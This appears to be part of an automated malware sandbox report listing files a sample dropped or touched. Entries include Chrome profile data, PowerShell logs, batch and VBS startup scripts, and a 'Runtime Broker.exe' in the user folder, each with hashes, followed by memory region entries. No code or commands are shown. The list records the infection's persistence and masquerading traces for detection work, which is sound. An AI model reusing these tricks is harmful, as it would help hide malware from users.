    SHA512 6bd66b972d4f364891c03791dd5932b85cd9ae850f0ed4708e67183290bb497ae429482acd4977ab79c5ba31d074b577bbb2624ed7c056f4869bf088ad9c0b77

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
    Filesize 2KB
    MD5 209353a74c45edb9f25917b640f962f6
    SHA1 5d9304edfdd7e6576dfaa43615b10c7c0a3ddea9
    SHA256 318cf5f5e5787d6ae5f4feb4cf1d1e49236086e8e63b6fe314e1e68825b21e78
    SHA512 01981757ef00ca8a6383b7e5e9fdb6e1038e2725de6f2b23f0feefc048d53858e1e66d8aa19f180cad5d68ab4e6afb8751e44c195e36280772e0e1bfc79fb059

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
    Filesize 264KB
    MD5 0fdbe6432e0b06449631e0b24afeefe1
    SHA1 6aeb5f2c21cb7d6628ee5cbbe2363133421b461a
    SHA256 5bf032905be200c16b494e72b33bd4878332314a1d820bdabef10105ceccfec7
    SHA512 3204cfbde48888044cf5c635456d07c7636c8aef1c6c742b3a59fca611231ecdb7dddeac7f7b67e090b2230587232ad45018d31d3df7311819d91b544f7c40d8

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize 4KB
    MD5 a8bc16aaca1ecc1b68266c0b2d941263
    SHA1 56ba9a3259253a45af766a20a689f185f0c27311
    SHA256 1903586a5b3b0a69a603ba8a4d2ce720cc8c4fc226392f4d0c749b45ea7b2504
    SHA512 d976f493d1acff5dc7804afe8a549b9e8f27332c6a6ef945b3783de93f95fd3468ef3895097ac8c6fdb53b4255cb56095a2288a7599139e7445c3e34c901cc43

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
    Filesize 3KB
    MD5 847bc97307c58707a3c38f2b6e1a444d
    SHA1 1f867077a5624bc8a3d44a9f36505fa5f9ea2707
    SHA256 5d3e83f727bb06c84efc27ba8b844152ed92f35e7377e22ca830e67debcda9c3
    SHA512 e936c5f3332011af9a6cd6183642efd313892b2f6741d412343ad1055a16cf10ad6dff17da57650f5aa7f62e9630c08825bc3a2e6da94ae9330d390293f21dd7

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
    Filesize 2B
    MD5 d751713988987e9331980363e24189ce
    SHA1 97d170e1550eee4afc0af065b78cda302a97674c
    SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
    SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize 1KB
    MD5 000cfb695bc437dc83cad7522c8cab3c
    SHA1 5f07163b2f568ddd2d59c5eefbd8a2577dd58f7d
    SHA256 b72c78087d6bdccc246f4e8f346bf707b2fc2c63c871892e47e6e0b0d7baf8bd
    SHA512 b860a5e2506b7bb25c97b2cb73b885aa27822ec2a1ce213f4e96c2f5d100307b8bbae8bb25f837ce24f51090baee32e4403f18b3f457a78e752de171d9482911

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize 1KB
    MD5 33082d0c5f535e20f17d106153052870
    SHA1 fc70462159f01e50dc3cbe66e8bcf1d727882671
    SHA256 b181cd4f5818bfcf15c5f731247407a7167f4a7b9e0338e139e9c102e84e8a84
    SHA512 0b0669678dbe80ab320150a15a8bf5d35857dcdc07e365529d92060d440184c8d85059874149408b08f6b6fb44a949c86ff9906ec5207fb8838a3dea7c5f6c03

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize 356B
    MD5 96cd4b35550f6b08a462f018141a98c3
    SHA1 12c0e2a3cc3bb679d2f9e997bd148aeda4a66e34
    SHA256 a29e919fdb81a89eef44c8c515a22eabe58bde1c6d9d0b743d419aeb5908050d
    SHA512 d67ab526baaaa5f26bed2874a8ae64fdaf461cecb447663816d955e5375a576004c8690d1a969aed870acc9bf306c0120685ae4d4539ad64057d021c7bc6107d

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize 356B
    MD5 49c3add340f5f7abf75cd982a2b383f6
    SHA1 fd73b9698c8bdc088a56ee27b968fe358b49b7c5
    SHA256 df461d332c63375354c9dee7c58ba0b4e2f46f6e23166ae2e63c8c73ba361257
    SHA512 4236ffd9d8d2e51cf7e269275612afc4a25bdb6d14bdbc2a5fcb5246065fb1a9fd70eda4649046c25a80a7ca1b975dd98391c93efabd035f3a2d2abced52e01a

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
    Filesize 1KB
    MD5 b913fe2cf820a2384b5b74ee09ff45f0
    SHA1 dec8db73a30ae56a1119ce38ce2e2ee9619d219c
    SHA256 419a49d6ea0a65a5e7de19e11a68b69d0a5d744ce14d9470e670b1e479058c16
    SHA512 0ac194b162e3cd40b231494d3a63af2e41262c7930547b708fb41425300158d441fdb2032f5b3b0b1573709fef1a07fe2eaa7061cf029504e5e7188193447790

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize 8KB
    MD5 5bb333c33ec30cda96e6bd471c8a6145
    SHA1 d0541eda57d733339a2acf4a8b8e12e10d910787
    SHA256 78d88758aa1f10b91caa59c55669c6fc29fc7bd71aabc212fc49acb750d419c3
    SHA512 962941b58cf78ea4a31b9dca797e6e302eda88e5c4b04f13b25e6d6a618f1cc62af21c4a0176db5682ac065ed2be925828aae1a7315d9a68b365759367077464

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize 6KB
    MD5 c071fa3a8a2ef10cf118d421a4550771
    SHA1 90fb0d7fdf69222b7763fb5b93b865efa63c5ddf
    SHA256 3a8a10cf6d2ba3834bc7cd13517230fb9890978724731cbcb9ba7899294e3491
    SHA512 d1517dce65c50a0b5ee76742af3d04013b30913a65ebb6e1a755210f08a4e03143e5d6173cd335c584677824c0d4198196104088c558d25034f892a429f5cdb3

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
    Filesize 8KB
    MD5 f629836f9fb3d4ee82359255d6803147
    SHA1 879160fc74d49b1d86e323b5c7b1f51da9438e09
    SHA256 8df25826123d9f35203c3fce43437c9c8bbdbc7b29d3c2c93d44ee9df3922dfd
    SHA512 7b6e469ebd68567d9b2a71189974b67e0e0017dd0474acd3282882d50d8122d4477c82e7f08c038307c7a8c0f87daa2fc890873499bd0a0d97da9c1506ab5a28

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
    Filesize 16KB
    MD5 43a10b3e1f08da8722aeb4a2306e52fd
    SHA1 f2f99d490d391ad2c3d7d2dff6dc3df6f1372444
    SHA256 e1cd3bd4f5e575167eeb853684877d661bb95797c272d5ab8aab755dd8b84905
    SHA512 0ca97f75d79bac5156a671358802d09a3288bc4ec7d4eadbe5b2154bdfec76367497a81c0c2c2024f5c843372e46cbfcfbedb76d9b84d3c2d9582e565a7df143

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index

                                            Filesize

                                            456B

                                            MD5

                                            ebd848dcf6934e855166d2e39a05b219

                                            SHA1

                                            9673cbed8c0963f9ab0b02b18b9009356421e805

                                            SHA256

                                            cb28afb08990b93c8fac58b45ba312f576eee1fe8162db9fd9b8e7923ddf4e8d

                                            SHA512

                                            a9615ea7a1dce33399b848842b314032d346203f20a729c499ddecfb6c70e9b3d0345bd172a207fe242078b6b40e4f76d9307c64895241df8586f3c7af4f24de

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\3c39af4e-388b-4a34-8b08-275686669aa3\index-dir\the-real-index~RFe58dcfd.TMP

                                            Filesize

                                            48B

                                            MD5

                                            17e94abcb444592b7c29b146ed266225

                                            SHA1

                                            1f5714a345986389bb78ddc43d31e16547f247a8

                                            SHA256

                                            c1398ad501b7865bf431292a046b8f843580a63cc291a84d4f0570ba74df9463

                                            SHA512

                                            4a2ecc506f239fb83c0db94106a65adcccb6adffaf0e89576ceb39261dc6da391432eee58542906c3fecfbd79f81fce010d2846a37c83ded928021856f8ec7f0

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index

                                            Filesize

                                            72B

                                            MD5

                                            f3c02b851c6abc5bbfa96c8f5fb8579b

                                            SHA1

                                            2fee0c966a34d205b94f338de579121f1c878d0b

                                            SHA256

                                            851cb56ab8a23f16b17115aa61904a9c82ebb99470d1b8b2639f93be48ceb98c

                                            SHA512

                                            491ba5a4ffb2699c114a095976a760c15b18aec1c58b82b5c8ef00fd21da964d156e77f881521ec843fd754fba54d054defca3f8bc1fc205326dd35df1ab87cf

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\b4aae9a3-2732-4fc5-9e1e-8532126a8478\index-dir\the-real-index~RFe58daab.TMP

                                            Filesize

                                            48B

                                            MD5

                                            ab5644f7d345836d1787d9808216dd4b

                                            SHA1

                                            fe3e611763cf0fb2d3c2d13a4f19c9d8a00a7caf

                                            SHA256

                                            fe4d59027424f998dfda8bbb4a748c14c40de91be829b5c6b9eb70dab4f0ddca

                                            SHA512

                                            c094a741797b03ce6d5bf50475fa486389a2e183b69b12ff800daef23f1124ce2a25a6fd42f8af929644b17e5ab7db107ba90bd04ae61e701cf04a6bf7269bb3

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

                                            Filesize

                                            197B

                                            MD5

                                            526e75f739ef9bd02ebb77893ccc70b2

                                            SHA1

                                            a181ec73db03cb823d0f68329cccdda357492513

                                            SHA256

                                            0d011987ec9e30b03d6a8cb8b03876090080d8222b2e0c235c8073cf744c3d99

                                            SHA512

                                            61854f69c5fe48e9ec8f76be06106d1f2ccc51c93d9bf7f2e4f1a665804b3f63fe2102505b596de5e491a4c088e428296ae51d034026a2ac9f0d841a6119d077

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt

                                            Filesize

                                            194B

                                            MD5

                                            91d3addd55d196164f446a2e0a2c4670

                                            SHA1

                                            beb6cfdb45549b3faad37124afbc6735d28cdbdb

                                            SHA256

                                            24a16e796ae6c6e0c7b3e84c9adbec8dabb2f087f6a03ca9ae6a366e4d329208

                                            SHA512

                                            6b7aad8e0a55e7ec0255cc92c1ab3f17d96ad4985caa29b3139bd95a3d2193632f19ce3e98322a428ffc483bc2eed388b1631dd64ac7270c921bb2366742c8fa

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\4cc699dd486af2551d01b1a74abd5337c6e052e5\index.txt~RFe588c8b.TMP

                                            Filesize

                                            131B

                                            MD5

                                            9d00f7b3ecd92ae45fe8d0288166971e

                                            SHA1

                                            eace5e94d7ccf65a1c3b8e140152c632d6b2a38a

                                            SHA256

                                            c0e78796b6432e42758e08ceeafd249cd1906b562290b9f5f67db11c8829ccd3

                                            SHA512

                                            3664635f2133bb739b4650590b90b62519168388f56aa0d123f60cd1405b6a10d9273dd93afc6beb0e93ef1f1c7043eb0aa184753b40b0a30cf0e3e2419f919f

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

                                            Filesize

                                            16B

                                            MD5

                                            46295cac801e5d4857d09837238a6394

                                            SHA1

                                            44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                            SHA256

                                            0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                            SHA512

                                            8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                            Filesize

                                            264B

                                            MD5

                                            aa3230e0626c4f66ed7a3e58a7dcc97b

                                            SHA1

                                            d3684911f3f82c59e90b8674b9a2dddb2280acbf

                                            SHA256

                                            3eaea5faa8f318c8febc396aee0e3bf5ac67bd46ab29e7f01e6c1b5aaf0c6b88

                                            SHA512

                                            64fc196f4dff1ff3c1bcc01d36d23acfce8c4605596b674039ad34ddc388b5761468e65bc36c6498ed88633a76bf63f25a12a091a39ad3569788c39fd210033f

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58da7d.TMP

                                            Filesize

                                            48B

                                            MD5

                                            7c826602c5a34419f177adf7c03c7238

                                            SHA1

                                            ebd86c44e06015edfa1aa1ec5f9aa3e87f59f821

                                            SHA256

                                            3c79b65e66015d778678f564460997a3a7cdefc5e05f85ad98f7564f845cc448

                                            SHA512

                                            c301b96b0ea3ec35197d0d8243e67261f760b49fffa60e288a41c4bc30d7ff3105dfd1d87e34917e619ba6440c7747ef4565f65d2a4f89dea0bd62e32cb68972

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\d9946227-28f5-4bd2-8d4f-712d5cfca0de.tmp

                                            Filesize

                                            7KB

                                            MD5

                                            d810b949d7aa3b10541f274e42a683b6

                                            SHA1

                                            d161d05ac39e238d8b2d94b2a856d07cc3e132b2

                                            SHA256

                                            0f4dcfcd01ae4d5c6ec037a78abc526e15cd602e08c63aa21b9c8ce80b6ade2b

                                            SHA512

                                            cec958076c9864274efe2cc68755d2dc5a7ef094acf9b6e8c2c69981d26bd3fd8f1e0c67719bc8b5f1a2553899149ed6e1c4633951b21ae6f12fe7f97f2fbd14

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            261KB

                                            MD5

                                            865a551095e53d195927e9cc1689ad40

                                            SHA1

                                            f20c7a70ba70119101d013b816b30c2e525242de

                                            SHA256

                                            8c1a9e10d82384e3cba34cdc4941ec38ad10fa7cde11def71190415e8bf89b18

                                            SHA512

                                            5048b482ec7d939466d83c8f7ca0225edf860ade55a2deb2793f351c0ff084ae251dc78cea843c1667bd6398638bf74953f5226a338503b244c997128e89b901

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                            Filesize

                                            261KB

                                            MD5

                                            cd8205c7ca6020c90ddccf3ad2a9442d

                                            SHA1

                                            0b041d6cdb2da7e01cb72b46cb3e91119baaf8e7

                                            SHA256

                                            5d1b7c2b57411b1e746c978c2e12e7f16bf98c3f4d4ebb9aa2f3ef3c4be3319e

                                            SHA512

                                            6f40f5541529193c0fee89107b55ff69d31379d8a595fc396808d26449ff13a3ad63cdb3d493cb2bd377d21e676922bc8485f05eaaef719388fba9c9b09fd518

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            85KB

                                            MD5

                                            027ac85656f3df3a280311f4dcd4d69c

                                            SHA1

                                            a2f0b99fdfc2f3d263769a7f38f18e84678a795c

                                            SHA256

                                            69292bdf5844176ce1ccb8f4be4733b04ac2600b8bf244b1ec843b3765e3dcac

                                            SHA512

                                            c17fb10b5798e1113912803d429cad90e5691b75cd5fd408eec0b682c0fe8df1e8763c0db17e848659152cef5c7631ff3f19f03ac5c6207d0eaf53d1439e7eeb

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                            Filesize

                                            88KB

                                            MD5

                                            18abbb34345326f8fde4918d0535d731

                                            SHA1

                                            70e0490eff7f87b71baed444f8283989126f16e6

                                            SHA256

                                            0b3b5f425f58ce1416958f53a9314c4da978ab26017b1d32c9686d08bfcf256a

                                            SHA512

                                            eb56a349ffb0c3c699d2c7a9a3932a36e3135f5f986dbb6ac43917e96e60825f4a1583e3047b91816506f222fd1a0b76b50f8900a5face9af47552be835e3d47

                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58919c.TMP

                                            Filesize

                                            83KB

                                            MD5

                                            3a453cb951a76d09d8c47c1d9f04fb46

                                            SHA1

                                            e47e45461466e708a7be8b9b5a9119171d8fe86a

                                            SHA256

                                            20f479fbd846a0ef94f7f5dea01d6636745edde6cc17321643bdcaae355fccfd

                                            SHA512

                                            72d96b1c4524bfa2f9f9b66c8aa45c7d599b09361ad37d18b8ad80951ed0c80c89bd121a3e27536efd36ae2cceaa4fb95952a2cf0aecfdbf9a23699f48f5735c

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Broker.exe.log

                                            Filesize

                                            2KB

                                            MD5

                                            627073ee3ca9676911bee35548eff2b8

                                            SHA1

                                            4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                            SHA256

                                            85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                            SHA512

                                            3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                            Filesize

                                            3KB

                                            MD5

                                            df472dcddb36aa24247f8c8d8a517bd7

                                            SHA1

                                            6f54967355e507294cbc86662a6fbeedac9d7030

                                            SHA256

                                            e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                            SHA512

                                            06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                            Filesize

                                            1KB

                                            MD5

                                            82fa4a888cbdfa7fee6c937009faa09d

                                            SHA1

                                            ccd30a243634b505642e89c60c128acad5cf8ba9

                                            SHA256

                                            71eca5c0a2738ec9154045e1b2be6ac19a41f9bcc341a2e3d613f74a2212ea55

                                            SHA512

                                            971f6009d1cf3ac33d44cc6521cc490aca9643865ce97517290e52b8dacb14ba615590b57f4ef10ab1659a3897558c5f088e7d5d366c4f0c0e10828c73be214e

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            1KB

                                            MD5

                                            eb15ee5741b379245ca8549cb0d4ecf8

                                            SHA1

                                            3555273945abda3402674aea7a4bff65eb71a783

                                            SHA256

                                            b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636

                                            SHA512

                                            1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                            SHA1

                                            9910190edfaccece1dfcc1d92e357772f5dae8f7

                                            SHA256

                                            0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                            SHA512

                                            5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            80707036df540b6657f9d443b449e3c3

                                            SHA1

                                            b3e7d5d97274942164bf93c8c4b8a9b68713f46f

                                            SHA256

                                            6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0

                                            SHA512

                                            65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Filesize

                                            944B

                                            MD5

                                            e47c3fa11e796c492a8388c946bf1636

                                            SHA1

                                            4a090378f0db26c6f019c9203f5b27f12fa865c7

                                            SHA256

                                            4bb861850395dcc3bec4691e8b9f0fa733b8a2d568d460a9201d65250b12fee1

                                            SHA512

                                            8d4af4eba3019cd060561f42cff11374eafe59da5e5ad677e41d0b9198b87d6d13706e760d13c70574ed1384993a1597f886d21fe6ecd0186379a1e93db30695

                                          • C:\Users\Admin\AppData\Local\Temp\Log.tmp

                                            Filesize

                                            224B

                                            MD5

                                            9ec9007da004d61ca9778a8498af2f7b

                                            SHA1

                                            add118014c9275a88b0717f370c71f500a94a223

                                            SHA256

                                            76bed517c101343aa7dfb6b3661c8794cc07140e71f5724def0b9ec61db69383

                                            SHA512

                                            0be7976ba8a0a43335aea53e5657fd4987f21b5a33af4851afabfdb7d1a90f8daed37137b021a5bfe7f6c8f5871e38b51cb855320092a3e992e4f8dca7385db1

                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm0qjyeq.r1q.ps1

                                            Filesize

                                            60B

                                            MD5

                                            d17fe0a3f47be24a6453e9ef58c94641

                                            SHA1

                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                            SHA256

                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                            SHA512

                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                          • C:\Users\Admin\AppData\Roaming\startup_str_837.bat

                                            Filesize

                                            302KB

                                            MD5

                                            7a5f5944302b8298714b56ae2f138b7c

                                            SHA1

                                            669b42f2f6e76895899d84d5ad7a12f23d951f13

                                            SHA256

                                            3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

                                            SHA512

                                            73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

                                          • C:\Users\Admin\AppData\Roaming\startup_str_837.vbs

                                            Filesize

                                            115B

                                            MD5

                                            a299d6b6ae224adfb40548bab06b7ff9

                                            SHA1

                                            74221fa5196465f9b258dcd4ddb39399c408cb20

                                            SHA256

                                            a4fe79eb3bf7afd34cb8d435306f15a9be15029e1616fba7443d4478607c37d6

                                            SHA512

                                            83de95510fbb89c4b2f29050c8bfd88dfd3283440c371818da8a9d1e82a8a0cf1e2ea86f38bc4a3b18fc6ee491b85d7cbd6584a08c143efed148c5afdc06bd42

                                          • C:\Users\Admin\Runtime Broker.exe

                                            Filesize

                                            440KB

                                            MD5

                                            0e9ccd796e251916133392539572a374

                                            SHA1

                                            eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

                                            SHA256

                                            c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

                                            SHA512

                                            e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

                                          • \??\pipe\crashpad_2152_VYJBYMLHQEQSYWOW

                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • memory/536-92-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-14-0x0000019CBD3F0000-0x0000019CBD42A000-memory.dmp

                                            Filesize

                                            232KB

                                          • memory/536-93-0x00007FFF13893000-0x00007FFF13895000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/536-10-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-0-0x00007FFF13893000-0x00007FFF13895000-memory.dmp

                                            Filesize

                                            8KB

                                          • memory/536-1-0x0000019CBD140000-0x0000019CBD162000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/536-11-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-12-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/536-13-0x0000019CBD3E0000-0x0000019CBD3E8000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/1716-156-0x00000297D7CA0000-0x00000297D7CE6000-memory.dmp

                                            Filesize

                                            280KB

                                          • memory/3760-48-0x0000020C7C1F0000-0x0000020C7C20A000-memory.dmp

                                            Filesize

                                            104KB

                                          • memory/3760-663-0x0000020C7CB70000-0x0000020C7CBFE000-memory.dmp

                                            Filesize

                                            568KB

                                          • memory/3760-94-0x0000020C7C8C0000-0x0000020C7C8CC000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/4940-16-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-25-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-26-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-27-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB

                                          • memory/4940-30-0x00007FFF13890000-0x00007FFF14352000-memory.dmp

                                            Filesize

                                            10.8MB